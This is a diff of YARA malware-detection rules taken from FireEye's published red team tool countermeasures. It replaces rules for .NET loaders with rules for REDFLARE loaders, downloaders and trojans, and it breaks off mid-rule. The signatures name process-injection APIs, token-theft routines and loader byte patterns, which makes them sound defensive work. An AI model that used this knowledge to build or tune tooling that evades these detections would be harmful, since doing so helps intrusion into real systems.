 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_3 : FILE
+rule FIREEYE_RT_APT_Loader_Raw32_REDFLARE_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "42e4e777-6d51-5733-97df-dc27f13a27b7"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "8f8ec27f-afac-5da5-b76f-b984e14e0066"
+		date = "2020-11-27"
+		date = "2020-11-27"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_3.yar#L5-L16"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Raw32_REDFLARE_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "41cc6a4c7765b1e5e88d12660b69e434c83938ca974b9ccf6545b4dd5dd78378"
+		hash = "4022baddfda3858a57c9cbb0d49f6f86"
+		logic_hash = "05ed89bd82600b4d5ef01ece2e0a9bd84e968988fd2bda1bab4ec316a9a9906b"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		rev = 1
 
 	strings:
-		$create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A }
-		$iz1 = /_Cor(Exe|Dll)Main/ fullword
-		$rc4 = { 20 00 01 00 00 8D [2] 00 01 1? ?? 20 00 01 00 00 8D [2] 00 01 1? ?? 03 8E 69 8D [2] 00 01 1? ?? 16 0B 2B ?? 1? ?? 07 02 07 02 8E 69 5D 91 9E 1? ?? 07 07 9E 07 17 58 0B 07 20 00 01 00 00 32 }
-		$suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 }
+		$load = { EB ?? 58 [0-4] 8B 10 8B 48 [1-3] 8B C8 83 C1 ?? 03 D1 83 E9 [1-3] 83 C1 [1-4] FF D? }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) != 0x5A4D ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_DUEDLLIGENCE_1 : FILE
+rule FIREEYE_RT_APT_Loader_Win32_REDFLARE_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "d438575f-3cb2-5cff-b5d4-733044f62e61"
-		date = "2020-12-18"
-		modified = "2020-12-18"
+		id = "b8a2c388-3b27-5075-b0ee-2773ae0c67ad"
+		date = "2020-11-27"
+		date = "2020-11-27"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/Loader_MSIL_DUEDLLIGENCE_1.yar#L5-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win32_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		logic_hash = "56237d686b954950849adeedc87d5f9fbff2335a0ff033ba8571b3e3b93f587c"
+		hash = "01d68343ac46db6065f888a094edfe4f"
+		logic_hash = "f9165aabe4bad215211cf98559099030ddb8a76175fbfcfee3c6f25d7614bdad"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		rev = 1
 
 	strings:
-		$create_thread_injected = { 7E [2] 00 0A 0A 16 0B 16 8D [2] 00 01 0C 28 [2] 00 06 2? ?? 2A 28 [2] 00 0A 1E 3? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 2? ?? 7E [2] 00 04 7E [2] 00 04 28 [2] 00 0A 28 [2] 00 06 0C 7E [2] 00 0A 08 8E 69 7E [2] 00 04 7E [2] 00 04 28 [2] 00 06 0D 09 7E [2] 00 0A 28 [2] 00 0A }
-		$iz1 = /_Cor(Exe|Dll)Main/ fullword
-		$suspended_process = { 12 ?? FE 15 [2] 00 02 1? ?? FE 15 [2] 00 02 02 14 7E [2] 00 0A 7E [2] 00 0A 16 20 [2] 00 08 7E [2] 00 0A 14 12 ?? 12 ?? 28 [2] 00 06 }
+		$alloc_n_load = { 6A 40 68 00 30 00 00 [0-20] 6A 00 [0-20] FF D0 [4-60] F3 A4 [30-100] 6B C0 28 8B 4D ?? 8B 4C 01 10 8B 55 ?? 6B D2 28 }
+		$const_values = { 0F B6 ?? 83 C? 20 83 F? 6D [2-20] 83 C? 20 83 F? 7A }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_HOLSTER_1 : FILE
+rule FIREEYE_RT_APT_Builder_PY_REDFLARE_1
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the a customized version of the 'DUEDLLIGENCE' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "e1e8979e-2dee-5061-a11d-00dcfba476c3"
-		date = "2020-12-09"
+		id = "3b5ad25d-ce66-572e-9a91-40a73b8fd447"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DUEDLLIGENCE/production/yara/HackTool_MSIL_HOLSTER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Builder_PY_REDFLARE_1.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "a91bf61cc18705be2288a0f6f125068f"
-		logic_hash = "bc254a1ab71f2a6092f139ce5a85347a7a4976f963603ffbbebb9b0d6ce6573c"
+		hash = "d0a830403e56ebaa4bfbe87dbfdee44f"
+		logic_hash = "1948cadb7242eb69bffbc222802ce9c1af38d7a846da09b6343b1449fe054e42"
 		score = 75
-		quality = 73
-		tags = "FILE"
-		rev = 2
+		quality = 75
+		tags = ""
+		rev = 1
 
 	strings:
-		$typelibguid1 = "a8bdbba4-7291-49d1-9a1b-372de45a9d88" ascii nocase wide
+		$1 = "LOAD_OFFSET_32 = 0x612"
+		$2 = "LOAD_OFFSET_64 = 0x611"
+		$3 = "class RC4:"
+		$4 = "struct.pack('<Q' if is64b else '<L'"
+		$5 = "stagerConfig['comms']['config']"
+		$6 = "_x86.dll"
+		$7 = "_x64.dll"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		all of them and @1 [ 1 ] < @2 [ 1 ] and @2 [ 1 ] < @3 [ 1 ] and @3 [ 1 ] < @4 [ 1 ] and @4 [ 1 ] < @5 [ 1 ]
 }
-rule FIREEYE_RT_Tool_MSIL_Sharpgrep_1 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_8 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'SharpGrep' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "c7569d33-f57d-5f9c-aa2a-78866c680b5b"
-		date = "2020-12-09"
+		id = "b090df60-8f4e-51ca-944c-6f9ce2d9c913"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPPGREP/production/yara/Tool_MSIL_SharpGrep_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_8.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "c22bfc50b3ab3c4082006aad3c3c89684cffe1e429b001b0bb08758856a47d04"
+		hash = "9c8eb908b8c1cda46e844c24f65d9370, 9e85713d615bda23785faf660c1b872c"
+		logic_hash = "5b8a0402886daebefb995e7df0877d51727c5b8dc58eeb8ff16ceec5e7811a20"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$typelibguid0 = "f65d75b5-a2a6-488f-b745-e67fc075f445" ascii nocase wide
+		$1 = "PSRunner.PSRunner" fullword
+		$2 = "CorBindToRuntime" fullword
+		$3 = "ReportEventW" fullword
+		$4 = "InvokePS" fullword wide
+		$5 = "runCommand" fullword
+		$6 = "initialize" fullword
+		$trap = { 03 40 00 80 E8 [4] CC }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Tool_MSIL_Csharputils_1 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CSharpUtils' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "a0e8c45a-759a-5611-aa2a-3113a75fb651"
-		date = "2020-12-09"
+		id = "c3054680-9c87-5d90-b78e-b260904340df"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPUTILS/production/yara/Tool_MSIL_CSharpUtils_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_1.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "11dfd44fb4ee1e610c2e4a941b3a1e88eafc30a2a2237529150e73bceb2a1324"
+		hash = "100d73b35f23b2fe84bf7cd37140bf4d,4e7e90c7147ee8aa01275894734f4492"
+		logic_hash = "08ea2151418f7f75a8b138146c393a5ea85647320cc8e9fe1930d75871ab94bb"
 		score = 75
-		quality = 65
+		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$typelibguid0 = "2130bcd9-7dd8-4565-8414-323ec533448d" ascii nocase wide
-		$typelibguid1 = "319228f0-2c55-4ce1-ae87-9e21d7db1e40" ascii nocase wide
-		$typelibguid2 = "4471fef9-84f5-4ddd-bc0c-31f2f3e0db9e" ascii nocase wide
-		$typelibguid3 = "5c3bf9db-1167-4ef7-b04c-1d90a094f5c3" ascii nocase wide
-		$typelibguid4 = "ea383a0f-81d5-4fa8-8c57-a950da17e031" ascii nocase wide
+		$1 = "initialize" fullword
+		$2 = "runCommand" fullword
+		$3 = "stop" fullword
+		$4 = "fini" fullword
+		$5 = "VirtualAllocEx" fullword
+		$6 = "WriteProcessMemory" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_1 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_4 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1b5f1f39-9fa2-5940-8da3-03808e4b7a5d"
-		date = "2020-12-03"
-		date = "2020-12-03"
+		id = "6e8621b0-a0ee-5fc7-a2b8-1973a42d6e37"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_1.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_4.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
-		logic_hash = "f2244c6761639c1162a77a5e82296903c3cc21fbf46d262c779c5e4d6a2ef937"
+		hash = "a8b5dcfea5e87bf0e95176daa243943d, 9dcb6424662941d746576e62712220aa"
+		logic_hash = "d027e98ad8fa6d03a49ceffd81fba6a621173e2dbabae652bee2f4e8489bb378"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 }
-		$sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 }
-		$ss1 = "\x00NtMapViewOfSection\x00"
-		$ss2 = "\x00NtOpenProcess\x00"
-		$ss3 = "\x00NtAlertResumeThread\x00"
-		$ss4 = "\x00LdrGetProcedureAddress\x00"
-		$tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00"
+		$s1 = "LogonUserW" fullword
+		$s2 = "ImpersonateLoggedOnUser" fullword
+		$s3 = "runCommand" fullword
+		$user_logon = { 22 02 00 00 [1-10] 02 02 00 00 [0-4] E8 [4-40] ( 09 00 00 00 [1-10] 03 00 00 00 | 6A 03 6A 09 ) [4-30] FF 15 [4] 85 C0 7? }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] ) and ( all of ( $ss* ) ) and ( all of ( $tb* ) )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_RURALBISHOP_2 : FILE
+rule FIREEYE_RT_APT_Loader_Win64_REDFLARE_2 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "3befb3f2-81d1-5db2-84d9-773158b9837c"
-		date = "2020-12-03"
-		date = "2020-12-03"
+		id = "043f4e29-710d-5e17-a0ed-82cd3a565194"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/new/yara/Loader_MSIL_RURALBISHOP_2.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Loader_Win64_REDFLARE_2.yar#L4-L18"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
-		logic_hash = "0467532d643cf0200c6561b0724c884230892bf59db163c311b7d4f8acbb63d6"
+		hash = "100d73b35f23b2fe84bf7cd37140bf4d"
+		logic_hash = "9fad845ed963fae46ac7ddc44407d5f6ed0a061f6a106764b9f912ef718279b4"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$ss1 = "\x00NtMapViewOfSection\x00"
-		$ss2 = "\x00NtOpenProcess\x00"
-		$ss3 = "\x00NtAlertResumeThread\x00"
-		$ss4 = "\x00LdrGetProcedureAddress\x00"
-		$ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00"
-		$ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00"
-		$tb1 = "\x00SharpSploit.Execution.DynamicInvoke\x00"
+		$alloc = { 45 8B C0 33 D2 [2-6] 00 10 00 00 [2-6] 04 00 00 00 [1-6] FF 15 [4-60] FF 15 [4] 85 C0 [4-40] 20 00 00 00 [4-40] FF 15 [4] 85 C0 }
+		$inject = { 83 F8 01 [2-20] 33 C0 45 33 C9 [3-10] 45 33 C0 [3-10] 33 D2 [30-100] FF 15 [4] 85 C0 [20-100] 01 00 10 00 [0-10] FF 15 [4] 85 C0 [4-30] FF 15 [4] 85 C0 [2-20] FF 15 [4] 83 F8 FF }
+		$s1 = "ResumeThread" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_1 : FILE
+rule FIREEYE_RT_APT_Downloader_Win32_REDFLARE_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1a3f4247-25f4-51ca-b881-209c0753b915"
-		date = "2020-12-03"
-		date = "2020-12-03"
+		id = "e8d7ee31-568e-58ac-98ad-49baa2eb37ea"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_1.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win32_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "e91670423930cbbd3dbf5eac1f1a7cb6"
-		logic_hash = "f020efff58c8b7761d700c662c422a9e1ffdf8fe5f6648e421b7c257e3b8d078"
+		hash = "05b99d438dac63a5a993cea37c036673"
+		logic_hash = "a340a2a732a9b1aa74ca9d84009a88d1b14b6a03140a859384c0d6e745e4a90a"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 28 [2] 00 06 0A 06 7B [2] 00 04 [12-64] 06 7B [2] 00 04 6E 28 [2] 00 06 0B 07 7B [2] 00 04 [12-64] 0? 7B [2] 00 04 0? 7B [2] 00 04 0? 7B [2] 00 04 6E 28 [2] 00 06 0? 0? 7B [2] 00 04 [12-80] 0? 7B [2] 00 04 1? 0? 7B [2] 00 04 }
-		$sb2 = { 0F ?? 7C [2] 00 04 28 [2] 00 0A 8C [2] 00 01 [20-80] 28 [2] 00 06 0? 0? 7E [2] 00 0A 28 [2] 00 0A [12-80] 7E [2] 00 0A 13 ?? 0? 7B [2] 00 04 28 [2] 00 0A 0? 28 [2] 00 0A 58 28 [2] 00 0A 13 [1-32] 28 [2] 00 0A [0-32] D0 [2] 00 02 28 [2] 00 0A 28 [2] 00 0A 74 [2] 00 02 }
-		$ss1 = "\x00NtMapViewOfSection\x00"
-		$ss2 = "\x00NtOpenProcess\x00"
-		$ss3 = "\x00NtAlertResumeThread\x00"
-		$ss4 = "\x00LdrGetProcedureAddress\x00"
-		$tb1 = "\x00DTrim.Execution.DynamicInvoke\x00"
+		$const = "Cookie: SID1=%s" fullword
+		$http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [1-10] 6A 00 8B [1-8] 5? 6A 00 6A 00 6A 00 8B [1-8] 5? 68 [4] 8B [1-8] 5? FF 15 [4-40] 6A 14 E8 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] ) and ( all of ( $ss* ) ) and ( all of ( $tb* ) )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_MSIL_TRIMBISHOP_2 : FILE
+rule FIREEYE_RT_APT_Downloader_Win64_REDFLARE_1 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "90ee2569-2e68-517b-b2d7-8c4015d92683"
-		date = "2020-12-03"
-		date = "2020-12-03"
+		id = "15a5e22b-84b0-5b36-8772-1d496ac447b2"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/APT_Loader_MSIL_TRIMBISHOP_2.yar#L4-L22"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Downloader_Win64_REDFLARE_1.yar#L4-L17"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "c0598321d4ad4cf1219cc4f84bad4094"
-		logic_hash = "4cccfca0c06954105f762066741b6c35599a6c28df8b7c255a2659059169578f"
+		hash = "9529c4c9773392893a8a0ab8ce8f8ce1"
+		logic_hash = "1b9bece6083403615841c752eac48fd20095e918d6e175563dd122be2885d875"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$ss1 = "\x00NtMapViewOfSection\x00"
-		$ss2 = "\x00NtOpenProcess\x00"
-		$ss3 = "\x00NtAlertResumeThread\x00"
-		$ss4 = "\x00LdrGetProcedureAddress\x00"
-		$ss5 = "\x2f(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00i\x00|\x00I\x00n\x00j\x00e\x00c\x00t\x00)\x00$\x00"
-		$ss6 = "\x2d(\x00?\x00i\x00)\x00(\x00-\x00|\x00-\x00-\x00|\x00/\x00)\x00(\x00c\x00|\x00C\x00l\x00e\x00a\x00n\x00)\x00$\x00"
-		$tb1 = "\x00DTrim.Execution.DynamicInvoke\x00"
+		$const = "Cookie: SID1=%s" fullword
+		$http_req = { 00 00 08 80 81 3D [4] BB 01 00 00 75 [1-10] 00 00 80 00 [1-4] 00 10 00 00 [1-4] 00 20 00 00 89 [6-20] 00 00 00 00 [6-20] 00 00 00 00 [2-10] 00 00 00 00 45 33 C9 [4-20] 48 8D 15 [4] 48 8B 0D [4] FF 15 [4-50] B9 14 00 00 00 E8 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Ruralbishop_3 : FILE
+rule FIREEYE_RT_APT_Trojan_Win_REDFLARE_5 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public RuralBishop project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "55a060ef-74e2-50d9-9090-558aaa04d97d"
-		date = "2020-12-09"
+		id = "892981d6-f310-5ee8-95b5-dd4bd720a86c"
+		date = "2020-12-01"
+		date = "2020-12-01"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/TRIMBISHOP/production/yara/Loader_MSIL_RuralBishop_3.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/REDFLARE/production/yara/APT_Trojan_Win_REDFLARE_5.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "09bdbad8358b04994e2c04bb26a160ef"
-		logic_hash = "a4c55dede432c249e36e96ca09555448b0343969d389bfdb4bd459fe34e05ea1"
+		hash = "dfbb1b988c239ade4c23856e42d4127b, 3322fba40c4de7e3de0fda1123b0bf5d"
+		logic_hash = "ab38e5ebded026829672941709797b40f8e13fb244b6a8ed3545de4358f727b8"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		rev = 3
 
 	strings:
-		$typelibguid1 = "FE4414D9-1D7E-4EEB-B781-D278FE7A5619" ascii nocase wide
+		$s1 = "AdjustTokenPrivileges" fullword
+		$s2 = "LookupPrivilegeValueW" fullword
+		$s3 = "ImpersonateLoggedOnUser" fullword
+		$s4 = "runCommand" fullword
+		$steal_token = { FF 15 [4] 85 C0 [1-40] C7 44 24 ?? 01 00 00 00 [0-20] C7 44 24 ?? 02 00 00 00 [0-20] FF 15 [4] FF [1-5] 85 C0 [4-40] 00 04 00 00 FF 15 [4-5] 85 C0 [2-20] ( BA 0F 00 00 00 | 6A 0F ) [1-4] FF 15 [4] 85 C0 74 [1-20] FF 15 [4] 85 C0 74 [1-20] ( 6A 0B | B9 0B 00 00 00 ) E8 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Loader_MSIL_Trimbishop_1 : FILE
+rule FIREEYE_RT_APT_Keylogger_Win64_REDFLARE_1 : FILE
 {
 	meta:
